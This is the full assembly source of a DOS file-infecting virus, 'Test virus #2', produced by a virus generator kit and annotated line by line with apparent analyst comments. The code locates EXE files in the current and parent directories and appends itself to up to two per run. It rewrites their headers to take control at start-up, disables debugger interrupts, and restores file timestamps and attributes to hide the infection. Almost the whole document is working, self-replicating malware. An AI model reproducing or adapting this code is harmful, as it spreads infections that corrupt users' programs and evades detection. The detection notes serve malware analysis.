
  1. ; test2.asm : Test virus #2
  2. ; Created with Biological Warfare - Version 0.90ß by MnemoniX
  3.  
  ; Assembler constants and segment setup.  16-bit DOS, MASM/TASM Intel
  ; syntax, single code segment laid out like a .COM image (org 100h).
  4. PING            equ     0A6CFh                   ; not referenced anywhere in this listing
  5. INFECT          equ     2                        ; infections per run; traverse/infect_dir stop once 'infections' reaches it
  6. MARKER          equ     08080h                   ; value stored in the MZ header initial-SP word (+10h) to mark an infected file
  7. 
  8. code            segment
  9.                 org     100h                     ; image begins at PSP:100h when run as the first-generation sample
  10.                 assume  cs:code,ds:code
  11.  
  ;----------------------------------------------------------------------
  ; Entry and main flow: start -> virus_begin -> exe_exit.
  ; Analyst notes: appending infector for DOS MZ executables.  The sample
  ; is a 3-byte stub jump, a 3-byte dummy host, then the body.  Because
  ; the body runs at an arbitrary offset once appended to a host, bp is
  ; loaded with the relocation delta and every data access is [bp + x].
  ;----------------------------------------------------------------------
  12. start:
  13.                 db      0E9h,3,0          ; to virus: 'jmp near +3' skips 'host' and lands on virus_begin
  14. host:
  15.                 db      0CDh,20h,0        ; host program stand-in: 'int 20h' (terminate) plus one pad byte
  16. virus_begin:
  17.                 push    ds es             ; host's ds/es, restored before returning to it
  18. 
  19.                 call    $ + 3             ; BP is instruction ptr.: pushes the run-time address of 'pop bp'
  20.                 pop     bp                ; bp = run-time offset of 'pop bp'
  21.                 sub     bp,offset $ - 1   ; minus its assembly-time offset ($ - 1 = the 1-byte 'pop bp') => delta
  22. 
  23.                 xor     ax,ax             ; mild anti-trace code: es := 0 (interrupt vector table), ax = 0 to store
  24.                 mov     es,ax             ; kill interrupts 1 & 3
  25.                 mov     di,6              ; 0000:0006 = segment word of the INT 1 (single-step) vector
  26.                 stosw                     ; zeroed: a tracing debugger's single-step handler is disabled
  27.                 mov     di,14             ; 0000:000E = segment word of the INT 3 (breakpoint) vector
  28.                 stosw                     ; zeroed likewise
  29. 
  30.                 in      al,21h            ; lock out & reopen keyboard: 8259A master PIC interrupt-mask register
  31.                 xor     al,2              ; flip bit 1 (IRQ1 = keyboard) ...
  32.                 out     21h,al
  33.                 xor     al,2              ; ... and flip it back; the mask ends up unchanged
  34.                 out     21h,al
  35. 
  36.                 push    cs
  37.                 pop     ds                ; ds := cs so the [bp + ...] data below is addressable
  38.                 lea     dx,[bp + offset new_DTA]
  39.                 mov     ah,1Ah            ; DOS Set DTA: FindFirst/FindNext results will land in new_DTA
  40.                 int     21h
  41. 
  42.                 mov     byte ptr [bp + infections],0   ; per-run counter, compared against INFECT
  43. 
  44.                 push    [bp + exe_cs]     ; this host's original entry CS:IP and SS:SP are overwritten
  45.                 push    [bp + exe_ip]     ; by infect_exe for each new victim, so they are parked on
  46.                 push    [bp + exe_ss]     ; the stack for the duration of the search ...
  47.                 push    [bp + exe_sp]
  48.                 call    traverse          ; walk '*.EXE' from the current directory upward, infecting up to INFECT files
  49. 
  50.                 call    activate          ; payload hook (empty stub in this sample)
  51. 
  52.                 pop     [bp + exe_sp]     ; ... and restored here before control returns to the host
  53.                 pop     [bp + exe_ss]
  54.                 pop     [bp + exe_ip]
  55.                 pop     [bp + exe_cs]
  56.                 pop     es ds             ; host's es/ds back
  57.                 mov     dx,80h            ; restore the default DTA at PSP:80h
  58.                 mov     ah,1Ah
  59.                 int     21h
  60. 
  61. exe_exit:
  62.                 mov     ax,ds                   ; fix up return address: relies on ds = PSP segment (DOS sets ds at .EXE entry)
  63.                 add     ax,10h                  ; PSP + 10h paragraphs = load segment of the program image
  64.                 push    ax                      ; keep the load segment for the SS computation below
  65.                 add     ax,cs:[bp + exe_cs]     ; header-relative CS -> absolute; cs: override since ds is the host's again
  66.                 mov     cs:[bp + return_cs],ax  ; patch the far-jump operand
  67. 
  68.                 mov     ax,cs:[bp + exe_ip]
  69.                 mov     cs:[bp + return_ip],ax
  70. 
  71.                 pop     ax
  72.                 add     ax,cs:[bp + exe_ss]        ; restore stack: SS relocated from the load segment the same way
  73.                 cli                             ; no interrupt between the ss and sp writes
  74.                 mov     ss,ax
  75.                 mov     sp,cs:[bp + exe_sp]
  76. 
  77.                 call    fix_regs                ; fix up registers: ax=bx=dx=di=bp=0, si=100h
  78.                 sti
  79. 
  80.                 db      0EAh                    ; back to host program: opcode of 'jmp far ptr16:16'; the two words below are its operand
  81. return_ip       dw      0                       ; filled in above with the host's relocated entry point
  82. return_cs       dw      0
  83. 
  84. exe_cs          dw      -16                     ; orig CS:IP (header-relative).  With ds = PSP the defaults
  85. exe_ip          dw      103h                    ; resolve to PSP:103h = 'host' above for a first-generation run
  86. exe_sp          dw      -2                      ; orig SS:SP; defaults resolve to SS = PSP segment, SP = 0FFFEh
  87. exe_ss          dw      -16
  88.  
  ;----------------------------------------------------------------------
  ; fix_regs: set the general registers to values resembling a fresh
  ; program start before the far jump into the host.
  ; Out: ax = bx = dx = di = bp = 0, si = 100h.  Flags clobbered.
  ;----------------------------------------------------------------------
  89. fix_regs:
  90.                 xor     ax,ax                   ; ax := 0
  91.                 cwd                             ; dx := sign-extension of ax, i.e. 0
  92.                 xor     bx,bx
  93.                 mov     si,100h
  94.                 xor     di,di
  95.                 xor     bp,bp                   ; bp held the relocation delta; no [bp + ...] access follows
  96.                 ret
  97.  
  98.  
  ;----------------------------------------------------------------------
  ; traverse: from the current directory walk toward the root, calling
  ; infect_dir in each directory until 'infections' equals INFECT or
  ; chdir('..') fails; then chdir back to the starting directory.
  ; In: bp = delta, ds = cs.  Uses a 64-byte path buffer on the stack.
  ;----------------------------------------------------------------------
  99. traverse:
  100.                 sub     sp,64                   ; allocate stack space: 64-byte buffer for the saved path
  101.                 mov     si,sp
  102.                 inc     si                      ; leave byte 0 free for the '\' added below
  103.                 mov     ah,47h                  ; get current directory -> ds:si (ASCIZ, no drive, no leading '\')
  104.                 xor     dl,dl                   ; dl = 0: default drive
  105.                 push    ds
  106.                 push    ss
  107.                 pop     ds                      ; ds := ss so ds:si addresses the stack buffer
  108.                 int     21h
  109. 
  110.                 pop     ds                      ; ds = cs again
  111.                 dec     si
  112.                 mov     byte ptr ss:[si],'\' ; fix directory: prepend '\' so the saved path is root-relative
  113. 
  114. next_dir:
  115.                 call    infect_dir              ; FindFirst/FindNext '*.EXE' in the current directory
  116. 
  117.                 cmp     byte ptr [bp + infections],INFECT
  118.                 je      traverse_done           ; quota for this run reached
  119. 
  120.                 lea     dx,[bp + outer]         ; repeat in next dir up: chdir '..'
  121.                 mov     ah,3Bh
  122.                 int     21h
  123.                 jnc     next_dir                ; CF set when chdir fails (e.g. already at the root) -> stop
  124. 
  125. traverse_done:
  126.                 add     sp,64                   ; reset stack pointer
  127.                 mov     dx,si
  128.                 push    ds
  129.                 push    ss
  130.                 pop     ds                      ; ds:dx = the saved '\path'
  131.                 mov     ah,3Bh                  ; chdir back to where the run started
  132.                 int     21h
  133.                 pop     ds
  134.                 ret
  135.  
  ;----------------------------------------------------------------------
  ; infect_dir: enumerate '*.EXE' in the current directory via the DTA
  ; (set to new_DTA at start) and hand each name to 'execute', stopping
  ; early once 'infections' equals INFECT.
  ; In: bp = delta, ds = cs.
  ;----------------------------------------------------------------------
  136. infect_dir:
  137.                 mov     ah,4Eh                  ; DOS FindFirst; result record is written to the DTA
  138.                 lea     dx,[bp + find_me]       ; ds:dx = '*.EXE'
  139.                 int     21h
  140.                 jc      infect_done             ; no match in this directory
  141. 
  142. next_file:
  143.                 lea     dx,[bp + new_DTA + 1Eh] ; DTA+1Eh = ASCIZ name of the file just found
  144.                 call    execute                 ; examine and possibly infect it
  145.                 cmp     byte ptr [bp + infections],INFECT
  146.                 je      infect_done             ; quota reached (traverse checks the same counter)
  147.                 mov     ah,4Fh                  ; DOS FindNext on the same DTA
  148.                 int     21h
  149.                 jnc     next_file
  150. 
  151. infect_done:
  152.                 ret
  ;----------------------------------------------------------------------
  ; execute: per-candidate file handler.
  ; In: ds:dx = ASCIZ file name, bp = delta.
  ; Clears the file's attributes, opens it read/write, saves its
  ; timestamp, reads the first 28 bytes (MZ header) into read_buffer and
  ; dispatches to infect_exe on an 'MZ' signature.  Both outcomes
  ; (fix_date_time after a successful write, dont_infect otherwise)
  ; converge on 'close', which restores the original attributes and
  ; closes the handle.  Note for detection: attribute stripping plus
  ; timestamp restore are the tells this routine leaves.
  ;----------------------------------------------------------------------
  153. execute:
  154.                 push    si
  155. 
  156.                 mov     ax,4300h                ; change attributes: 4300h = Get File Attributes -> cx
  157.                 int     21h
  158. 
  159.                 push    cx dx ds                ; original attributes, name pointer and its segment for 'close'
  160.                 xor     cx,cx                   ; cx = 0: clear read-only/hidden/system/archive
  161.                 call    set_attributes
  162. 
  163.                 mov     ax,3D02h                ; open file read/write
  164.                 int     21h
  165.                 jc      cant_open
  166.                 xchg    bx,ax                   ; bx := handle for the 3Fh/40h/42h/3Eh calls that follow
  167. 
  168.                 mov     ax,5700h                ; save file date/time -> cx:dx
  169.                 int     21h
  170.                 push    cx dx                   ; kept so the timestamp can be put back after writing
  171.                 mov     ah,3Fh                  ; read
  172.                 mov     cx,28                   ; 28 bytes = MZ header through the overlay-number word
  173.                 lea     dx,[bp + read_buffer]
  174.                 int     21h
  175. 
  176.                 cmp     word ptr [bp + read_buffer],'ZM'   ; 'MZ' signature, little-endian
  177.                 je      infect_exe              ; yes, infect as .EXE
  178. 
  179.                 jmp     dont_infect             ; not an MZ image
  180. 
  181. fix_date_time:
  182.                 pop     dx cx                   ; entered from infect_exe once body and header are written
  183.                 mov     ax,5701h                ; restore file date/time (hides the modification from a date check)
  184.                 int     21h
  185. 
  186.                 inc     byte ptr [bp + infections]
  187. 
  188. close:
  189.                 pop     ds dx cx                ; restore attributes (cx saved at the top)
  190.                 call    set_attributes
  191. 
  192.                 mov     ah,3Eh                  ; close file
  193.                 int     21h
  194. 
  195. cant_open:
  196.                 pop     si
  197.                 ret
  198.  
  199.  
  ; set_attributes: DOS Set File Attributes.  In: ds:dx = ASCIZ name,
  ; cx = attribute bits.  CF set on failure (not checked by callers here).
  200. set_attributes:
  201.                 mov     ax,4301h
  202.                 int     21h
  203.                 ret
  204.  
  ; dont_infect: skip path for non-MZ, overlay or already-marked files.
  205. dont_infect:
  206.                 pop     cx dx                   ; can't infect, skip: drop the saved date/time (file was not written)
  207.                 jmp     close                   ; still restore attributes and close the handle
  208.  
  ;----------------------------------------------------------------------
  ; infect_exe: append the body to an MZ executable and repoint its header.
  ; In: bx = handle, read_buffer = first 28 header bytes, bp = delta.
  ; MZ header words used (offsets relative to read_buffer):
  ;   +02 bytes in last page   +04 pages        +08 header size (paragraphs)
  ;   +0E SS   +10 SP   +14 IP   +16 CS   +1A overlay number
  ; Infection marker: initial SP (+10h) == MARKER.  Rejects overlays and
  ; already-marked files.  Exits through fix_date_time in 'execute'.
  ;----------------------------------------------------------------------
  209. infect_exe:
  210.                 cmp     word ptr [bp + read_buffer + 26],0
  211.                 jne     dont_infect             ; overlay, don't infect (+1Ah must be 0 for a main program)
  212. 
  213.                 cmp     word ptr [bp + read_buffer + 16],MARKER
  214.                 je      dont_infect             ; infected already: the initial-SP word carries the marker
  215. 
  216.                 les    ax,dword ptr [bp + read_buffer + 20]  ; ax = IP (+14h), es = CS (+16h)
  217.                 mov    [bp + exe_cs],es                     ; host entry, consumed by exe_exit when this copy runs
  218.                 mov    [bp + exe_ip],ax
  219.                 les    ax,dword ptr [bp + read_buffer + 14]  ; ax = SS (+0Eh), es = SP (+10h)
  220.                 mov    [bp + exe_ss],ax
  221.                 mov    [bp + exe_sp],es
  222.                 mov    word ptr [bp + read_buffer + 16],MARKER  ; new initial SP; doubles as the infection marker
  223.                 mov     ax,4202h                ; to end of file: lseek(handle, cx:dx = 0, SEEK_END) -> dx:ax = size
  224.                 cwd                             ; dx := 0 (sign-extension of the positive 4202h)
  225.                 xor     cx,cx
  226.                 int     21h
  227. 
  228.                 push    ax dx                   ; save file size (dx:ax) for the page arithmetic below
  229. 
  230.                 push    bx                      ; handle; bx is scratch until the pop
  231.                 mov     cl,12                   ; calculate offsets for CS: paragraphs = size >> 4,
  232.                 shl     dx,cl                   ; and IP: computed as (dx << 12) + (ax >> 4)
  233.                 mov     bx,ax
  234.                 mov     cl,4
  235.                 shr     bx,cl
  236.                 add     dx,bx                   ; dx = file size in paragraphs
  237.                 and     ax,15                   ; ax = size mod 16 = entry IP within that paragraph
  238.                 pop     bx                      ; handle back
  239. 
  240.                 sub    dx,word ptr [bp + read_buffer + 8]    ; minus header paragraphs: CS relative to the load module
  241.                 mov    word ptr [bp + read_buffer + 22],dx   ; new entry CS = start of the appended body
  242.                 mov    word ptr [bp + read_buffer + 20],ax   ; new entry IP
  243.                 add    dx,100h                               ; SS = new CS + 100h paragraphs
  244.                 mov    word ptr [bp + read_buffer + 14],dx
  245. 
  246.                 pop     dx ax                   ; calculate prog size: dx:ax = original size again
  247. 
  248.                 add     ax,VIRUS_SIZE + 3       ; plus the bytes appended below
  249.                 adc     dx,0
  250.                 mov     cx,512                  ; in pages: dx:ax / 512 -> ax = pages, dx = remainder
  251.                 div     cx                      ; then save results
  252.                 inc     ax                      ; round the page count up
  253.                 mov     word ptr [bp + read_buffer + 2],dx   ; +02 bytes in last page
  254.                 mov     word ptr [bp + read_buffer + 4],ax   ; +04 pages in file
  255. 
  256.                 mov     ah,40h                  ; write: append VIRUS_SIZE + 3 bytes from virus_begin at EOF
  257.                 mov     cx,VIRUS_SIZE + 3
  258.                 lea     dx,[bp + virus_begin]
  259.                 int     21h
  260. 
  261. 
  262.                 mov     ax,4200h                ; back to beginning: lseek(handle, 0, SEEK_SET)
  263.                 cwd
  264.                 xor     cx,cx
  265.                 int     21h
  266. 
  267.                 mov     ah,40h                  ; and fix up header: write back the 28 modified bytes
  268.                 mov     cx,28
  269.                 lea     dx,[bp + read_buffer]
  270.                 int     21h
  271.                 jmp     fix_date_time           ; done: restore timestamp, count it, close
  272.  
  ; activate: payload hook, called once per run after traverse.
  273. activate:
  274.        ; Insert your routine here (generator placeholder; no payload present in this sample)
  275.                 ret
  276.  
  277. courtesy_of     db      '[BW]',0                ; generator tag; not referenced by code, usable as a scan string
  278. signature       db      'Test virus #2',0       ; sample name; likewise unreferenced by code
  279.  
  ;----------------------------------------------------------------------
  ; get_extension: scan up to 64 bytes at ds:dx for '.'.  On return es:di
  ; is one past the '.' (ZF=1) or past the 64-byte window (ZF=0).
  ; Not called from anywhere in this listing (generator leftover).
  ; Clobbers es, di, cx, al, flags.
  ;----------------------------------------------------------------------
  280. get_extension:
  281.                 push    ds                      ; find extension: es := ds
  282.                 pop     es
  283.                 mov     di,dx                   ; es:di = string
  284.                 mov     cx,64                   ; scan limit
  285.                 mov     al,'.'
  286.                 repnz   scasb                   ; stop at the first '.' or when cx runs out
  287.                 ret
  288.  
  ; Data, uninitialised scratch and size constants.
  289. find_me         db      '*.EXE',0               ; FindFirst mask used by infect_dir
  290. outer           db      '..',0                  ; chdir target used by traverse
  291. 
  292. infections      db      0                       ; per-run counter, compared against INFECT
  293. virus_end:
  294. VIRUS_SIZE      equ     virus_end - virus_begin ; body length; infect_exe writes VIRUS_SIZE + 3 bytes from virus_begin
  295. read_buffer     db      28 dup (?)              ; read buffer: MZ header scratch; lies past virus_end, so only
  296. new_DTA         db      128 dup(?)              ;   its first 3 bytes are covered by that write.  Private DTA set at start
  297. 
  298. end_heap:
  299. 
  300. MEM_SIZE        equ     end_heap - start        ; whole image incl. scratch; not referenced in this listing
  301. 
  302. code            ends
  303.                 end     start                   ; entry point = the stub jump at 'start'
  304.